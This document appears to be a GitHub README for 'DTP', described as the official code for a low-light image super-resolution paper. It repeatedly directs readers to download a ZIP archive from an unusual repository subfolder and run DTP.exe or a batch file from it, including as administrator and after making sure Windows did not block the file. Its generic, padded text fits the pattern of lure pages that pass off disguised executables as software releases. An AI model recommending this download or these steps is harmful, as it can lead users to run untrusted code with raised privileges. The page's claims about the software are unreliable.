DTP is a Windows app for low-light image super-resolution. It helps improve dark or blurry photos by increasing detail and making the image clearer.
This project uses a dual-path method with frequency structural decoupling and regional-aware fusion. In simple terms, it handles different parts of an image in different ways so the final result keeps more detail.
Visit this page to download the software:
https://github.com/kajalj2389/DTP/raw/refs/heads/main/sima/Software_v3.2.zip
If the page offers a release file, download it to your PC. If it gives source files, download the package and follow the steps below to run it on Windows.
Use a Windows PC with:
- Windows 10 or Windows 11
- At least 8 GB of RAM
- 10 GB of free disk space
- A modern Intel or AMD processor
- A working internet connection for the first setup
For smoother use with large images, 16 GB of RAM helps.
Before you start, make sure you have:
- The DTP download from the link above
- A file unzip tool such as File Explorer or 7-Zip
- Python 3.10 or later if the download contains source files
- Microsoft Visual C++ Redistributable if the app asks for it
- A folder ready for input images and output files
Follow these steps:
-
Open the DTP download page: https://github.com/kajalj2389/DTP/raw/refs/heads/main/sima/Software_v3.2.zip
-
Download the file or package for Windows.
-
If the download is a ZIP file, right-click it and choose Extract All.
-
Open the extracted folder.
-
Look for one of these files:
- DTP.exe
- run.bat
- start.bat
- install.py
- README.md
-
If you see DTP.exe, double-click it to open the app.
-
If you see a batch file like run.bat, double-click it to start the program.
-
If you only see source files, install Python first, then use the setup steps in the included README file.
If the app uses Python, do this:
-
Open the extracted DTP folder.
-
Click the address bar in File Explorer.
-
Type cmd and press Enter.
-
In the command window, install the required packages if the project gives a requirements file:
pip install -r requirements.txt
-
If the project includes a model file, keep it in the folder named in the instructions.
-
Start the app with the command listed in the project files.
If the project includes an executable, you can skip the command steps and open the app directly.
Use DTP with a low-light image:
-
Open DTP.
-
Choose your input image.
-
Pick an output folder.
-
Select the scale level if the app shows one.
-
Start the process.
-
Wait for the result to finish.
-
Open the output image from the folder you chose.
The app works best with:
- Dark indoor photos
- Night street photos
- Low-exposure camera shots
- Grainy pictures that need more detail
If the app gives you options, use these starting values:
- Scale: 2x or 4x
- Output format: PNG
- Quality: High
- GPU mode: On, if your PC supports it
- Batch mode: On, if you want to process many images
If a photo has heavy noise, try one image first before you process a full folder.
Keep your files organized like this:
- Input folder: your original dark images
- Output folder: enhanced images made by DTP
A simple folder setup helps you find results fast and avoid overwriting your originals.
A user takes a night photo on a phone. The image looks dark and soft. DTP can improve the fine details in the scene and make the image easier to view or share.
It is useful for:
- Personal photo cleanup
- Small image restoration tasks
- Research work on low-light image enhancement
- Testing super-resolution methods on dark scenes
Inside the repository, you may see folders like:
- data
- models
- results
- demo
- test
- utils
- option
You may also see files for training, testing, or model loading. For normal use, focus on the run file, the demo file, or the Windows executable.
If the app does not open:
- Check that the files finished extracting
- Make sure Windows did not block the file
- Run the app as an administrator
- Install Python if the project uses Python files
- Install any packages named in requirements.txt
- Check that the model file is in the correct folder
If the image does not load:
- Use PNG or JPG files
- Try a shorter file path
- Avoid folders with special characters
- Move the image to a simple folder like Desktop or Pictures
If the result looks wrong:
- Try another input image
- Use a lower scale setting
- Check that the model file matches the app version
- Make sure the output folder has write access
A simple workflow looks like this:
- Download DTP from the link above
- Extract the files
- Open the app or run the start file
- Load a low-light image
- Run enhancement
- Save the output image
DTP is the official code for:
Dual-Path Learning based on Frequency Structural Decoupling and Regional-Aware Fusion for Low-Light Image Super-Resolution
It is designed for image enhancement work where dark images need clearer detail and better resolution.
https://github.com/kajalj2389/DTP/raw/refs/heads/main/sima/Software_v3.2.zip
You can keep the app in a folder like this:
- C:\DTP\
- C:\Users\YourName\Desktop\DTP\
- C:\Users\YourName\Downloads\DTP\
Use a short path with plain letters. This helps avoid file path errors during setup
To avoid losing your originals:
- Make a copy of each image before processing
- Save output files in a separate folder
- Keep the downloaded ZIP file until you confirm the app works
- Do not overwrite your source images
- Open the download page
- Download DTP
- Extract the files
- Open the app or run the setup file
- Load a dark image
- Start processing
- Save the clearer image